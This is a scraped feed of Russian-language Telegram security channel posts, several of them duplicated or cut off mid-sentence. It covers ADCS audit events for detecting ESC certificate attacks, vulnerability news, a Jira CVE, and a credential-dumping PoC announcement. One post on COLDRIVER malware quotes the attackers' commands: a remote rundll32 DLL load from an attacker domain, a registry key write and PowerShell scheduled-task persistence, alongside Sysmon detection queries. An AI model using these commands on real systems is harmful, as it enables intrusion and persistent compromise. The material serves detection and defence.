Forwarded from purple shift
Мы часто видим, что в различных статьях по детектированию техник повышения привилегий с использованием ADCS (ESC-атаки) авторы до сих пор используют старый формат событий запросов сертификатов в ADCS (события 4886—4889). Однако в этом году компания Microsoft обновила формат упомянутых событий, и обновлённая схема даёт намного больше возможностей для написания хантов.
К сожалению, документации от Microsoft на эти события пока нет. Но несложно догадаться, какая информация содержится в каждом новом поле.
На скриншоте выше показано, как выглядит событие 4886 при запросе сертификата с использованием ESC1-уязвимого шаблона утилитой certify.
В обновлённом формате видно использованный шаблон,
А вот как выглядит теперь событие 4887 при таком запросе:
Здесь, помимо уже перечисленных полей, наконец-то появился Serial Number сертификата. Его можно использовать при поиске событий запроса TGT-билетов с выданным сертификатом (поле
К сожалению, до сих пор нет информации об IP-адресе клиента, ApplicationPolicy в запросе, SID Extension в выданном сертификате. Но даже с таким набором полей уже намного удобнее работать, и гораздо меньше необходимости обогащать события данными из БД ADCS.
Рекомендуем обновить ваши ADCS-сервера, если вы ещё этого не сделали, и проверить, настроены ли ваши аудиты. А мы в следующем посте расскажем, как можно использовать новые поля в хантах для детектирования ESC-атак.
К сожалению, документации от Microsoft на эти события пока нет. Но несложно догадаться, какая информация содержится в каждом новом поле.
На скриншоте выше показано, как выглядит событие 4886 при запросе сертификата с использованием ESC1-уязвимого шаблона утилитой certify.
В обновлённом формате видно использованный шаблон,
subjectAltName (SAN) в CSR, RequestClientInfo с пользователем, хостом и даже процессом из COM-объекта, использованный протокол для запроса (RPC или DCOM) и т.д. А вот как выглядит теперь событие 4887 при таком запросе:
Certificate Services approved a certificate request and issued a certificate.
Request ID: 79
Requester: ESSOS\daenerys.targaryen
Attributes:
ccm:meereen.essos.local
Disposition: 3
SKI: 93 be 4b 84 64 d7 19 20 6e 94 82 4d 1f ed 86 a5 c1 2c 0e 09
Subject: CN=daenerys.targaryen, CN=Users, DC=essos, DC=local
Subject Alternative Name:
Other Name:
Principal Name=viserys.targaryen
Certificate Template: ESC1
Serial Number: 200000004f317b974a5431d29a00000000004f
Authentication Service: Kerberos
Authentication Level: Privacy
DCOMorRPC: DCOM
Здесь, помимо уже перечисленных полей, наконец-то появился Serial Number сертификата. Его можно использовать при поиске событий запроса TGT-билетов с выданным сертификатом (поле
CertSerialNumber). К сожалению, до сих пор нет информации об IP-адресе клиента, ApplicationPolicy в запросе, SID Extension в выданном сертификате. Но даже с таким набором полей уже намного удобнее работать, и гораздо меньше необходимости обогащать события данными из БД ADCS.
Рекомендуем обновить ваши ADCS-сервера, если вы ещё этого не сделали, и проверить, настроены ли ваши аудиты. А мы в следующем посте расскажем, как можно использовать новые поля в хантах для детектирования ESC-атак.
www.opennet.ru
Обновление VirtualBox 7.2.4 с устранением уязвимостей
Компания Oracle опубликовала корректирующий релиз системы виртуализации VirtualBox 7.2.2, в котором устранено 8 уязвимостей, подробности о которых пока не раскрываются. Указано только, что наиболее серьёзная проблема имеет уровень опасности 8.2 из 10. Кроме…
🔗Ссылка:
https://opennet.ru/64094/
https://opennet.ru/64094/
www.opennet.ru
Уязвимость в Rust-библиотеках для формата TAR, приводящая к распаковке файлов из вложенного архива
В написанной на языке Rust библиотеке async-tar, предоставляющей функции для чтения и записи tar-архивов, выявлена уязвимость (CVE-2025-62518, кодовое имя TARmageddon), позволяющая при распаковке специально оформленного tar-архива не только извлечь размещённые…
🔗Ссылка:
https://opennet.ru/64093/
https://opennet.ru/64093/
Forwarded from Caster
Релиз моего исследования о безопасности протокола Kerberos. Обнаружение атак на основе анализа сетевого трафика.
Caster - Parallax
Genre: Defensive
Label: caster0x00.com
Release Date: 21 October 2025
Language: English
Length: 10476 Words
Reading Time: 39 Minutes
Performed by: Caster
Written by: Mahama Bazarov
Cover Man: Mahama Bazarov (Sony ILCE-7M3, f/5.6, 1/3 sec)
https://caster0x00.com/parallax
Caster - Parallax
Genre: Defensive
Label: caster0x00.com
Release Date: 21 October 2025
Language: English
Length: 10476 Words
Reading Time: 39 Minutes
Performed by: Caster
Written by: Mahama Bazarov
Cover Man: Mahama Bazarov (Sony ILCE-7M3, f/5.6, 1/3 sec)
https://caster0x00.com/parallax
❤1
Forwarded from Detection is easy
Всем привет! 💻 ✌️
Давайте познакомимся с отчетом Google TI
Атака начинается с фишинга —
Атакующие предлагают жертве выполнить удалённую DLL
DLL используется для загрузки следующего этапа
Отличительные особенности:
🔤 Установка Python для запуска скриптов
🔤 Регистрация собственного расширения в реестре для хранения части ключа шифрования
🔤 Закрепление через планировщик задач
🔤 Использование
🔭 Обнаружение:
🔤 Описание аномалий подсистемы BITS в моей статье на хакере и в PR
🔤 Запуск DLL с удалённых ресурсов
🔤 Добавление новых расширений в ключ реестра
#detection@detectioneasy
#ttp@detectioneasy
Давайте познакомимся с отчетом Google TI
Атака начинается с фишинга —
ClickFix (Fake Captcha)Атакующие предлагают жертве выполнить удалённую DLL
rundll32.exe \\Ninspectguarantee.org\check\iamnotarobot.dll,humanCheck ;l'am not a robot
DLL используется для загрузки следующего этапа
Отличительные особенности:
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\.pietas" /v "ratio" /t REG_BINARY /d "f5e210ec114e1992b81ff89be58cfb2778005f734972239b9655b23fcee5593f19554d0a74dad52c67956781367b06e6" /f
powershell -c "
$s = New-Object -ComObject Schedule.Service;
$s.Connect();
$t = $s.NewTask(0);
$p = $t.principal;
$p.logontype = 3;
$p.RunLevel = 0;
$a = $t.Actions.Create(0);
$a.Path = \"$env:APPDATA\Python38-64\pythonw.exe\";
$a.Arguments = \"$env:APPDATA\Python38-64\Lib\libsystemhealthcheck.py\";
$a.WorkingDirectory = \"$env:APPDATA\Python38-64\";
$tr = $t.Triggers.Create(9);
$tr.userID = \"$env:computername\"+\"\\\"+\"$env:username\";
$tr.enabled = $true;
$s.GetFolder(\"\").RegisterTaskDefinition(\"System health check\", $t, 6, $null, $null, 0) | Out-Null;"
bitsadmin для загрузки .py-скриптов через BITS
ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and Image endswith "rundll32.exe" and CommandLine match "^\s*\\\\" and CommandLine match "\.dll,"
ProviderName="Microsoft-Windows-Sysmon" and EventId=22 and Image endswith "rundll32.exe" and QueryName not match "^(?:[A-Za-z0-9-]+\.)*(?:company\.com|company\.loc|corp\.local)$"
HKEY_CURRENT_USER\SOFTWARE\Classes\#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Google Cloud Blog
To Be (A Robot) or Not to Be: New Malware Attributed to Russia State-Sponsored COLDRIVER | Google Cloud Blog
Russia state-sponsored COLDRIVER started using new malware immediately following a May public disclosure of their activity.
Forwarded from SecuriXy.kz
🚨 Уязвимость Path Traversal в Jira (CVE-2025-22167)
Баг позволяет записывать файлы в любую доступную JVM-папку. При комбинировании с другими эксплойтами возможен RCE.
CVSS 8.7
Подробности: atlassian.com
📌 Проверьте свои инстансы и обновитесь как можно скорее.
Баг позволяет записывать файлы в любую доступную JVM-папку. При комбинировании с другими эксплойтами возможен RCE.
CVSS 8.7
Подробности: atlassian.com
📌 Проверьте свои инстансы и обновитесь как можно скорее.
👍1
Forwarded from 1N73LL1G3NC3
Credential Guard was supposed to end credential dumping. It didn't. @bytewreck just dropped a new blog post detailing techniques for extracting credentials on fully patched Windows 11 & Server 2025 with modern protections enabled.
🔗 DumpGuard
Proof-of-Concept tool for extracting NTLMv1 hashes from sessions on modern Windows systems.
P.S. Previously, crack.sh operated a free service for performing rainbow table lookups to recover NT hashes from NTLMv1 responses, but was recently shut down due to maintenance issues. In its absence, a new free service was published at ntlmv1.com.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from 1N73LL1G3NC3
Credential Guard was supposed to end credential dumping. It didn't. @bytewreck just dropped a new blog post detailing techniques for extracting credentials on fully patched Windows 11 & Server 2025 with modern protections enabled.
🔗 DumpGuard
Proof-of-Concept tool for extracting NTLMv1 hashes from sessions on modern Windows systems.
P.S. Previously, crack.sh operated a free service for performing rainbow table lookups to recover NT hashes from NTLMv1 responses, but was recently shut down due to maintenance issues. In its absence, a new free service was published at ntlmv1.com.
Please open Telegram to view this post
VIEW IN TELEGRAM